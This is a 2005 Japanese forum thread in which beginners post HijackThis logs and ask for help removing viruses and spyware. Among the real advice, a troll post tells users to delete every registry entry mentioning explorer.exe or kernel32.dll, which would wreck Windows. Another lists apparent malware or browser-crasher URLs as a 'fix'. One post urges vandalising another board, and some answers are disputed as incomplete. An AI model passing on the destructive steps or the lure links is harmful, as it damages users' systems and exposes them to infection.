あと、去年もやられてまた来たってことは、セキュリティが全然成ってない証拠
FWやアンチウイルス関係のソフトも買うべし

Windows Updateもしてないんだろうなぁ・・・

202 :ひよこ名無しさん:2005/08/04(木) 15:35:23 ID:???
>>177
どういうう症状なのか、アンチウイルスやアンチスパイウェアでスキャンして
何が検出されたのかされなかったのか、
そこら辺の事書かずにいきなり、ログ張られても

203 :ひよこ名無しさん:2005/08/04(木) 15:36:13 ID:???
>VitialMachine

204 :ひよこ名無しさん:2005/08/04(木) 15:36:37 ID:???
>>200
回答者で感染する奴なんていないだろうけど、
質問に来る初心者はWindows Updateしてないの大勢いるよ

205 :ひよこ名無しさん:2005/08/04(木) 15:37:34 ID:???
MS VirtialMachine
抜けてたな

206 :ひよこ名無しさん:2005/08/04(木) 15:39:25 ID:???
何年もWindows Updateしていないハゲなんて
徹底的に殺していいよ
もう顔も出さなくなるだろう 本望だ

207 :ひよこ名無しさん:2005/08/04(木) 15:42:50 ID:???
ここの回答している厨は、
感染なんてもうしねえようなウィルスがあるサイトばっかり貼ってるんだもんな
アホじゃねえのか?

208 :ひよこ名無しさん:2005/08/04(木) 16:06:11 ID:???
そりゃ、貼ってる奴はコピペしてるだけのアフォだからなw


209 :ひよこ名無しさん:2005/08/04(木) 16:17:59 ID:???
ウィルス対策ソフトがアラートを出したら全部感染するとでも思っているのか?
98%はWindows Updateで対策済みだわ ドアホ
無駄なのいちいち貼るな!

210 :ひよこ名無しさん:2005/08/04(木) 17:45:54 ID:cyBzVPua
自分の勉強のためにチャレンジしました。
以下のものはfixしても問題ないと思いますが、どうでしょう?
詳しい人の意見、まってます。

O4 - HKLM\..\Run: [dE3JeMdb4] C:\WINDOWS\dupxo.exe
O4 - HKLM\..\Run: [dE0eMdb4] C:\WINDOWS\dupxo.exe
O8 - Extra context menu item: Bookshelfで検索(&L) - res://C:\PROGRAM FILES\MICROSOFT REFERENCE\MICROSOFT BOOKSHELF 3.0\BSDEF.DLL/#1001
O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file)
O23 - Service: FanSpeedNT Service - Unknown owner - C:\Downloads\FanSpeed1_2_0\fanspeedNT.exe" (file missing)
O23 - Service: Windows Distributed Client (Win32DistributedClient) - Unknown owner - C:\windows\system32\msidrv.exe (file missing)

211 :ひよこ名無しさん:2005/08/04(木) 18:04:08 ID:NG1OKp1g
だめだ、IE起動させなくても勝手に起動しやがる・・・。
これじゃオペラで見てたって意味無い。。
あぁ、どうしよう

212 : ◆N9P3SuvBPo :2005/08/04(木) 18:11:45 ID:???
>177
とりあえずだけど、PCをセーフモードで起動して以下にチェック入れてFIXです。
O4 - HKLM\..\Run: [dE3JeMdb4] C:\WINDOWS\dupxo.exe
O4 - HKLM\..\Run: [dE0eMdb4] C:\WINDOWS\dupxo.exe
O4 - HKLM\..\Run: [dE0xーMdb4kg:^#Nb化9C:\Program Files\ISTsvc\istsvc.exe] C:\WINDOWS\dupxo.exe
O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file)
O15 - Trusted Zone: http://ny.contentmatch.net (HKLM)
O23 - Service: FanSpeedNT Service - Unknown owner - C:\Downloads\FanSpeed1_2_0\fanspeedNT.exe" (file missing)
O23 - Service: Windows Distributed Client (Win32DistributedClient) - Unknown owner - C:\windows\system32\msidrv.exe (file missing)

そしたらもう一度セーフモードで再起動して、ノートン・cwshredder・spy-bot・ad-awareで一気にスキャンしてください。
その後の症状の変化をお願いします。

213 : ◆N9P3SuvBPo :2005/08/04(木) 18:12:28 ID:???
>182とりあえず踏んでみたよ。ウイルス出たけど何とも無いよ。
>194も踏んでみました。REDLOF検出(当方マカフィーを使用しています)
>199さん自分のほうはREDLOFだけでした。

>210
O8 - Extra context menu item: Bookshelfで検索(&L) - res://C:\PROGRAM FILES\MICROSOFT REFERENCE\MICROSOFT BOOKSHELF 3.0\BSDEF.DLL/#1001
は大丈夫だろうと思います。
>211
仕事増やさないでよ・・・

214 :ひよこ名無しさん:2005/08/04(木) 18:51:49 ID:???
       , '´         :::::::::::ヽ、
      /     ,/ ||| \,  ::::::::::ヽ
      |   =="       `== ::::::::|
      |   -=・=-′ ヽ-=・=- :::::::::|
      |               ::::::::::|   え?
      |     (_人_)   ::::::::|
       'ヽ__        :::::::::::/

215 :ひよこ名無しさん:2005/08/04(木) 19:10:14 ID:???
>>210
O23 - Service: FanSpeedNT Service - Unknown owner - C:\Downloads\FanSpeed1_2_0\fanspeedNT.exe" (file missing)

これだろ?
FAN Speed
http://uk.geocities.com/twistedfuryuk/fanspeed/

216 :ひよこ名無しさん:2005/08/04(木) 19:11:54 ID:???
>>210
ちゅ〜か、お前誰?
Winnyやってないか?

217 : ◆N9P3SuvBPo :2005/08/04(木) 19:37:47 ID:???
おっぱいおっぱいいっぱいおっぱい

orz<アダルトサイトは感染経験者のみが行っても良いサイト

218 :ひよこ名無しさん:2005/08/04(木) 20:23:45 ID:???
>177-181
絶対に>>212の指示に従ってはなりません!!
>>213は罠です!!起動しなくなります!!
>>16を見てください!!!!
したがって僕がこれから言うことが正しい処置です!
パソコンのトラブル解消法(ME/XPは復元OFFに)
スタートをクリック→ファイルを使命して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

編集→検索をクリック

explorer.exeないしkernel32.dllを検索する

検索して見つかった物を片っ端から削除

検索が終わったらPCを再起動

問題解決→ウマー
この方法を使えばパソコンはスッキリしますよ。
当方PC歴10年・PCショップ
効果・ウイルスやブラクラとか、トロイの木馬ないしスパイウェアほぼ全部

219 :ひよこ名無しさん:2005/08/04(木) 20:27:30 ID:???
なんか今日はずいぶん多いな 変な人達が
どれもテンプレ読めば解決する程度のケースじゃねえか
なめてんのか?

220 :ひよこ名無しさん:2005/08/04(木) 20:29:14 ID:???
http://81.222.131.59/dl/adv659.php
http://babe.the-killer.bz
http://205.252.250.226/zator/adv3048/
http://195.225.177.38/tn/index.html
http://www.uncensoredchicks.com/index.html
http://85.255.113.18/inc/nan7.html
それでも解決しない場合は上のアドレスを踏んでみてください(^○^)
本当にスッキリしますよ。
天才回答者ここに現る!
下げ

221 :ひよこ名無しさん:2005/08/04(木) 20:43:00 ID:???
>>220
おお!!是非コテになって常駐してください。

222 : ◆N9P3SuvBPo :2005/08/04(木) 20:50:43 ID:???
>220
どこかで見たようなURLだな…見覚えあるぞこれ。

223 :WING:2005/08/04(木) 20:57:35 ID:???
http://bbs02.nan-net.com/system/log/56
→違反画像を公開してる。
 注意しても全く聞き入れ無い頭空っぽな奴の集まり

ガセスレか業者アド入れて荒らして閉鎖に追い込もうぜ。


224 :ひよこ名無しさん:2005/08/04(木) 21:18:21 ID:???
>>220
ブラクラ集め 乙

225 : ◆N9P3SuvBPo :2005/08/04(木) 21:56:17 ID:???
>211
>だめだ、IE起動させなくても勝手に起動しやがる・・・。
それなら、いったんMicrosoftからIE6SP1(orSP2?)をDL→デスクトップに保存して
コンパネからIEをアンインストールしてみては?

226 :ひよこ名無しさん:2005/08/04(木) 22:07:18 ID:???
>>182
これを踏んでしまいましたが、エロサイトのようなものが見えただけで
窓がどんどん開いたりはしませんでした。
ブラウザはSleipnirを使用してて、ポップアップなどを開かないように設定してたからかもしれません。
この場合も何かに感染してるんででしょうか?
ウイルススキャンなどでは何も検出されませんでした。

227 :ひよこ名無しさん:2005/08/04(木) 22:11:49 ID:EWj2Ajy7
このスレで書いてあることは大体やったつもりです。
C:\Program Files\xerox というのがセーフモードで消しても
再起動したら戻っちゃってるので、どうやって消したらいいのかなと・・。
よろしくお願いします。

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\conime.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Analog Devices\SoundMAX\smagent.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Live2ch\Live2ch.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\user\デスクトップ\hi\HijackThis.exe

228 :ひよこ名無しさん:2005/08/04(木) 22:12:43 ID:EWj2Ajy7
O1 - Hosts: 61.202.94.235 auth.lineage2.jp
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\READER\ACTIVEX\ACROIEHELPER.DLL
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: Google 検索(&G) - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: このページのキャッシュ - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: リンク元 - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: 翻訳(&T) - res://C:\Program Files\Google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: 関連ページ - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL


229 :ひよこ名無しさん:2005/08/04(木) 22:13:26 ID:EWj2Ajy7
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=36467&clcid=0x409
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by101fd.bay101.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1105991614406
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\smagent.exe

以上です、よろしくお願いします。

230 : ◆N9P3SuvBPo :2005/08/04(木) 22:18:45 ID:???
>227
あのさあ…
>C:\Program Files\xerox
ほんとうに消すつもり?

HijackThisでFIXする項目は次のものだけ
O1 - Hosts: 61.202.94.235 auth.lineage2.jp
O16のも全て(必要なものは再びインストールできますので)

231 :ひよこ名無しさん:2005/08/04(木) 22:22:33 ID:???
別に消したって問題ないじゃん
どうせ新しく作られるだけなんだから>xerox

232 :ひよこ名無しさん:2005/08/04(木) 22:23:09 ID:???
>>226
WindowsUpdateやってるなら問題ない

233 :ひよこ名無しさん:2005/08/04(木) 22:23:52 ID:???
>>230
eroだと思って不必要なファイルだと思ってました・・・orz
自分の検索不足でした、申し訳ありません。
削除ファイルわかりました、ありがとうございます。

234 : ◆N9P3SuvBPo :2005/08/04(木) 22:29:50 ID:???
>233
もし、ほんとうに削除したいのであれば、属性を全部解除して(駄目なら回復コンソール使用?)
セーフモードで起動してxeroxを削除。
それからレジストリエディタを起動してxeroxを検索して全部削除ってとこか。
↑の奴は試してはいかんぞ。

235 :182:2005/08/04(木) 22:30:57 ID:???
>232自分はUpdateしてませんでした。
そしたら>182の様になりました。
どなたか解決策がありましたらお願いします。



236 : ◆N9P3SuvBPo :2005/08/04(木) 22:33:04 ID:???
>235
使用OS

237 :226:2005/08/04(木) 22:36:46 ID:???
>>232
WindowsUpdateを最後に実行したのは7月2日なのですが大丈夫でしょうか?
スキャンではなにもひっかからないので、他に感染してるかどうか確認する方法はありますか?

238 :182:2005/08/04(木) 22:38:11 ID:???
>236
Windows98です。

239 : ◆N9P3SuvBPo :2005/08/04(木) 22:41:43 ID:???
>238
>Windows98
テンプレ>6の●「レジストリの復元」を使って正常なレジストリを復元する(9x限定)

240 :ひよこ名無しさん:2005/08/04(木) 22:49:52 ID:???
>>237
試しに踏んでみた人のカキコによると、感染するウイルスは次の二つ。
Bloodhound.Exploit.6
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.nibu.d.html
Downloader.Trojan
ttp://www.symantec.com/region/jp/sarcj/data/d/downloader.trojan.html

なので、7月2日ってのが今年なら、まず大丈夫だと思われ
でも、7月分のWindowsUpdateが当たっていない状態なので
当てとくとよいかと

241 :ひよこ名無しさん:2005/08/04(木) 22:58:01 ID:???
>239ちゃんと復元できました。
丁寧に接していただき嬉しかったです。
ありがとうございました。

242 : ◆N9P3SuvBPo :2005/08/04(木) 23:01:24 ID:???
>241
まだやることあるぞ。
アンチウィルスソフトは入っている?
入っているなら最新の状態になっているか?

243 :ひよこ名無しさん:2005/08/04(木) 23:02:46 ID:???
AdawareでもSpypodでも解決しなかったのでログ貼らせて質問させてください…

Logfile of HijackThis v1.99.1
Scan saved at 23:11:39, on 05/08/04
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\THOTKEY.EXE
C:\PROGRAM FILES\COMMON FILES\SYSTEM\MOSEARCH\BIN\MOSEARCH.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE
C:\WINDOWS\SYSTEM\CBA\PDS.EXE
C:\WINDOWS\SYSTEM\CBA\XFR.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\RTVSCN95.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\DEFWATCH.EXE
C:\PROGRAM FILES\NORTON UTILITIES\NPROTECT.EXE
C:\WINDOWS\SYSTEM\MSGSYS.EXE
C:\WINDOWS\SYSTEM\PSTORES.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\SYSTEM\ALISNDMG.EXE
C:\WINDOWS\SYSTEM\TPWRTRAY.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\VPTRAY.EXE

244 :243:2005/08/04(木) 23:03:54 ID:KpoI2DVi
C:\PROGRAM FILES\BROWSER MOUSE\BROWSER MOUSE\1.0\LWBWHEEL.EXE
C:\PROGRAM FILES\MELCO INC\エアステーションユーティリティ\CLIENTMG\ABRECEIVER.EXE
C:\WINDOWS\SYSTEM32\SVCNUT.EXE
C:\KAGI\WINLOCK.EXE
C:\WINDOWS\SYSTEM\CTFMON.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\OPENJANE\JANE2CH.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\PROGRAM FILES\COMMON FILES\SYSTEM\MOSEARCH\BIN\MOSDMN.EXE
C:\WINDOWS\デスクトップ\HIJACK\HIJACKTHIS.EXE

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [IrMon] IrMon.exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [ALiSndMgr] ALiSndMg.exe
O4 - HKLM\..\Run: [TOSHIBSU] TOSHIBSU.EXE
O4 - HKLM\..\Run: [Tpwrtray] TPWRTRAY.EXE
O4 - HKLM\..\Run: [vptray] c:\Program Files\Norton AntiVirus\vptray.exe
O4 - HKLM\..\Run: [NPROTECT] C:\Program Files\Norton Utilities\NPROTECT.EXE
O4 - HKLM\..\Run: [LWBMOUSE] C:\Program Files\Browser Mouse\Browser Mouse\1.0\lwbwheel.exe
O4 - HKLM\..\Run: [ABRECEIVER] "C:\PROGRAM FILES\MELCO INC\エアステーションユーティリティ\CLIENTMG\ABReceiver.exe"
O4 - HKLM\..\Run: [FastStart] C:\WINDOWS\system32\svcnut.exe home
O4 - HKLM\..\Run: [Winlock] c:\kagi\winlock.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [THotkey] C:\WINDOWS\SYSTEM\THotkey.exe

245 :243:2005/08/04(木) 23:07:06 ID:KpoI2DVi
O4 - HKLM\..\RunServices: [MOSearch] c:\PROGRA~1\COMMON~1\SYSTEM\MOSEARCH\BIN\MOSEARCH.EXE
O4 - HKLM\..\RunServices: [MDM7] "C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE"
O4 - HKLM\..\RunServices: [Intel PDS] c:\windows\system\cba\pds.exe
O4 - HKLM\..\RunServices: [Intel File Transfer] c:\windows\system\cba\xfr.exe
O4 - HKLM\..\RunServices: [TMA Distribution] c:\windows\system\cba\lcfinst.exe
O4 - HKLM\..\RunServices: [rtvscn95] c:\Program Files\Norton AntiVirus\rtvscn95.exe
O4 - HKLM\..\RunServices: [defwatch] c:\Program Files\Norton AntiVirus\defwatch.exe
O4 - HKLM\..\RunServices: [NPROTECT] C:\Program Files\Norton Utilities\NPROTECT.EXE
O4 - HKCU\..\Run: [ctfmon.exe] ctfmon.exe
O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://c:\PROGRA~1\MICROS~2\OFFICE10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM\MSJAVA.DLL
O9 - Extra 'Tools' menuitem: Java コンソール (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM\MSJAVA.DLL
O17 - HKLM\System\CCS\Services\VxD\MSTCP: Domain = osaka.hal.ac.jp
O17 - HKLM\System\CCS\Services\VxD\MSTCP: NameServer = 172.30.48.11,192.168.10.11,192.168.10.11

確実に消したほうがいいのを教えてください…初心者でよく分かりません。

246 : ◆N9P3SuvBPo :2005/08/04(木) 23:09:20 ID:???
>243
>Platform: Windows 98 SE
9x系なら「レジストリの復元」で対処したほうが早い(>6参照)

247 :243:2005/08/04(木) 23:10:04 ID:KpoI2DVi
あと、IEのトップページがres://C:\WINDOWS\system32\shdocpl.dll/security.htm#subID=MPV;401
に固定されたままです…どうかアドバイスお願いします


248 :182:2005/08/04(木) 23:11:56 ID:???
>242
>アンチウィルスソフトは入っている?
入っているんですけど最新の状態ではないです。

249 : ◆N9P3SuvBPo :2005/08/04(木) 23:12:47 ID:???
>248
最新の状態に更新できるのであれば今すぐしてください。

250 :ひよこ名無しさん:2005/08/04(木) 23:13:44 ID:???
すげーヤブ医者っぷりだな・・・

251 :182:2005/08/04(木) 23:13:50 ID:???
>249やってみます。

252 :ひよこ名無しさん:2005/08/04(木) 23:14:23 ID:???
なんかもうグダグダだな
質問する方も答える方もテンプレ無視かい

253 :ひよこ名無しさん:2005/08/04(木) 23:28:19 ID:???
>>251
        ∩∩
        | |_| |        / ̄ ̄ ̄ ̄ ̄ ̄ ̄
  / ̄\ ・∀・)   < リュンパッチ♪
.r ┤    ト、    \    \_______
|.  \_/  ヽ   |
|   __( ̄  | |  |
|    __)_ノ ̄ ̄ ̄ ̄\
ヽ___) ノ          \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

254 :ひよこ名無しさん:2005/08/04(木) 23:29:43 ID:???
てか、ウイルスに感染してるケースでは、ここで回答もらうより、セキュ板の
質問スレいったほうが確実だと思われ
季節柄あっちも荒れてはいるけど、ウイルスのことに関してはそれなりに
詳しい人も多いし、情報もここよりかは入ってきてるから

255 :ひよこ名無しさん:2005/08/04(木) 23:33:01 ID:???
ここは、Windows Updateもしていないやつがドアホ呼ばわりされて笑われるスレ

256 : ◆N9P3SuvBPo :2005/08/04(木) 23:34:10 ID:???
限界眠いので・・・最後に
>251
アンチウイルスソフトのアップデートができたら次のことをやって下さい。
テンプレ>4の5)、6)、7)、を一気に実行
テンプレ>8の■テンプレ補足
1.WindowsUpdateのやり方
IEを開く → ツール → WindowsUpdate
重要な更新は全てダウンロードしてインストールする事。

アンチウイルス更新不可の場合は、テンプレ>4の5)はしなくてもいいです。
定義ファイルの古いソフトでは無意味だから。

257 :ひよこ名無しさん:2005/08/04(木) 23:40:18 ID:???
アホか
アンチウイルスもってなくても、オンラインスキャンぐらいさせとけよ
本当はトロイに感染してる可能性を考えると、ネットの接続を切って
SafeModeでAntidoteもしくはeScanがいいんだけどな

258 :182:2005/08/04(木) 23:41:28 ID:???
>256ありがとうございました。

259 :ひよこ名無しさん:2005/08/04(木) 23:47:09 ID:???
レジストリだけ復元させて、トロイがスタートアップにウイルス入れといた場合や、
タスクスケジューラでウイルスを起動させる場合、DLLが感染した場合のことを
考えてねーだろ

260 :ひよこ名無しさん:2005/08/04(木) 23:49:33 ID:???
回線等に問題がないのですが夜以外にネットがつながらなくなってしまいました
どうすればいいでしょうか?

261 :ひよこ名無しさん:2005/08/04(木) 23:50:29 ID:???
>>260
>>1

262 :ひよこ名無しさん:2005/08/05(金) 00:02:30 ID:???
             /ヽ       /ヽ
            /  ヽ      /  ヽ
  ______ /     ヽ__/     ヽ
  | ____ /           :::::::::::::::\
  | |       / /      \   :::::::::::::::|
  | |       |  ●      ●    ::::::::::::::|     
  | |       |             :::::::::::::| なに
  | |       |   (__人__丿  .....:::::::::::::::::::/ このスレ?
  | |____ ヽ      .....:::::::::::::::::::::::<
  └___/ ̄ ̄       :::::::::::::::::::::::::|
  |\    |            :::::::::::::::::::::::|
  \ \  \___       ::::::::::::::::::::::::|

263 :ひよこ名無しさん:2005/08/05(金) 10:15:08 ID:ihiOdL02
細菌なんか
ログ針まくりだな

264 :ひよこ名無しさん:2005/08/05(金) 11:03:26 ID:???
>262
自己防衛のできないアホな初心者と
それに一生懸命応えようとする1人と
知ったか振りしてる割には何も答えられないアフォな煽り人
の集うスレです

265 :ひよこ名無しさん:2005/08/05(金) 11:11:21 ID:???
>>262
>>255

266 :ひよこ名無しさん:2005/08/05(金) 11:15:04 ID:???
>それに一生懸命応えようとする1人と
一生懸命ねぇ
トロイ仕込まれてる可能性のある奴にレジストリの復元だけさせてアンチウイルスの
更新が切れてるなら、全体スキャンすらしなくて良いとかほざいてるのが?
ウイルスの実行手段は、レジストリのスタートアップからだけじゃなくて、
スタートアップフォルダからの場合もあるのに、そこもチェックしていない
Downloa.Trojan食らってるなら、何をダウンロードされてるか分からないのだから
より慎重に対応しなければならないのに

質問者が直ったつもりになって、Keyloggerとか仕込まれたままだったら、
いい加減な事ほざいてた回答者の責任

267 :ひよこ名無しさん:2005/08/05(金) 11:23:08 ID:???
>いい加減な事ほざいてた回答者の責任

268 :ひよこ名無しさん:2005/08/05(金) 11:25:09 ID:???
ウイルスの事分からないなら、知ったかぶりでアドバイスするな、ってことだ


269 :ひよこ名無しさん:2005/08/05(金) 12:00:43 ID:???
>それに一生懸命応えようとする1人と

一生懸命な一人のアドバイス聞いて直った奴いたっけ?
おいらは見た事ないなぁ

270 : ◆N9P3SuvBPo :2005/08/05(金) 17:58:36 ID:???
とりあえず症状は治まったんだから後はゆっくりとやっていけばいい。
セーフモードでANTIDOTEのスキャンや他のセキュリティソフトのスキャンで
何も見つからなければ駆除は終了。

>スタートアップフォルダ
俺のは98SEなんで次の場所だけど、
スタート→プログラム→スタートアップ
ここは何も登録されていませんよ。

>タスクスケジューラ
場所は↓
Scheduled Tasks
ここに1つだけプログラムがありました。
名前は「McAfee.com アップデートの確認」です。

>レジストリの復元
感染前の正常な状態に復元できれば、あとは症状が再発しないように対処すればいいだろ。
別に感染後の異常な状態に復元するわけではないんだからー

271 :ひよこ名無しさん:2005/08/05(金) 18:20:35 ID:???
>>270
だれもお前のpcの環境なんか聞いてないんだが。
ってか、

>>スタートアップフォルダ
>俺のは98SEなんで次の場所だけど、
>スタート→プログラム→スタートアップ
>ここは何も登録されていませんよ。
>
>タスクスケジューラ
>場所は↓
>Scheduled Tasks
>ここに1つだけプログラムがありました。
>名前は「McAfee.com アップデートの確認」です。

てか、本当にこの程度の知識で回答してたのか?
いくらなんでも、スタートアップフォルダの意味まで分かってないのはひどすぎる。

272 :ひよこ名無しさん:2005/08/05(金) 18:39:15 ID:???
極論を言ったらシステムファイルに寄生しているウィルスで、
ソフトで発見出来ないものなんか誰にもわからないんだから、
そんならアドバイスなんてすんな!
偉そうに言ってんじゃねえよ。適当でいいの。

273 : ◆N9P3SuvBPo :2005/08/05(金) 18:42:47 ID:???
>スタートアップフォルダの意味まで
そのうち調べてみるよ。

てかよ?
>271きみは何?
きみならどんな酷い症状の質問者がここに来ても、リカバリ以外の方法で解決できる腕を持っているのか。
極まれに98/MEの古いOSで何も対策とかしていなくて、REDLOF感染の質問者も来る時もあるけど、
それでも君はリカバリ以外の方法で治せるよとでも言えるの?
というかREDLOF以外のウイルスで「感染したらリカバリ確定」となっているウイルスに感染している質問者
のPCをネット越しのアドバイスでリカバリ以外の手段で感染前の状態に修復できるのか?
そこまで豊富な知識と経験があれば、アンチウィルスソフトもWindowsUpdateも必要無いのでは?

274 : ◆N9P3SuvBPo :2005/08/05(金) 18:58:06 ID:???
えーと、じゃあこんな症状の質問者が来たらどうアドバイスする?
もちろん、PC買い替えとかの手段は無しの方向で

誠に申し訳ございませんが、どなたか私にアドバイスをしてください。
私のパソコンのOSはWindows98 Goldです。
4月26日にパソコンを起動させたら突然ハードディスクが唸ってしまい
画面がブツリと途絶えてしまいました。
その後もハードディスクからガリガリガリとすごい音がして怖くなって電源を落としました。
あとでパソコンを起動させてみるのですが、画面に何も表示されません。
起動ディスクを入れても、セットアップ用FDを入れても反応はありません。
後日、ネットカフェで問題が発生した4月26日に発病するウイルスを検索してみると
W95.CIHという名前のウイルスがヒットしました。
セキュリティベンダーサイトの説明でこのウイルスがどのような働きをするのか分かりました。
私はこのCIHというウイルスに感染し発病日にパソコンを起動させてしまったのです。
これからどう対処したらいいのでしょうか、お願いします。

275 :ひよこ名無しさん:2005/08/05(金) 19:12:33 ID:???
>>273
RedlofはHKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile
このキーだけまず復元してやれば、後は除去作業だけだ
不可能ではない
でも、初心者をいちいち相手してるほどお人よしではない。

276 :ひよこ名無しさん:2005/08/05(金) 19:25:52 ID:???
>>274
>起動ディスクを入れても、セットアップ用FDを入れても反応はありません。

BIOSだけ死んでいなければMS-DOS起動ディスクにDestroy.comをコピー
